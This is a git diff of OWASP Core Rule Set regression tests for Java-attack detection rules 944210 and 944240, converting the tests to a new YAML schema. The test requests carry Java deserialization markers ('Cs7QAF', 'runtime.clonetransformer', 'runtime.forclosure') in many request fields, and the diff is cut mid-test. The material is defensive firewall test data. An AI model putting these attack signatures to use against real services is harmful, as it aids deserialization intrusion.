Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 42 desc: "XML attribute value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 43 desc: "XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 44 desc: "Nested XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 45 desc: "Content-Type text/plain includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 46 desc: "Content-Type application/json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Cs7QAF\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log: + expect_ids: [944210] + - test_id: 47 desc: "Content-Type application/json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Cs7QAF\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-49 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-50 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-51 + Cs7QAF + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" + Cs7QAF + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml index 17b6ea658..7d5a2ef38 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml @@ -1,1791 +1,1789 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944240.yaml" - description: "Positive tests for rule 944240" +rule_id: 944240 tests: - - test_title: 944240-1 + - test_id: 1 desc: "Argument test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 2 desc: "Argument name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 3 desc: "Cookie test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 4 desc: "Cookie name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.clonetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 5 desc: "Request header test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 6 desc: "XML attribute value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 7 desc: "XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 8 desc: "Nested XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 9 desc: "Content-Type text/plain includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.clonetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 12 desc: "Argument test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 13 desc: "Argument name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log: + expect_ids: [944240] + - test_id: 14 desc: "Cookie test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 15 desc: "Cookie name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 16 desc: "Request header test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + uri: "/post" + version: 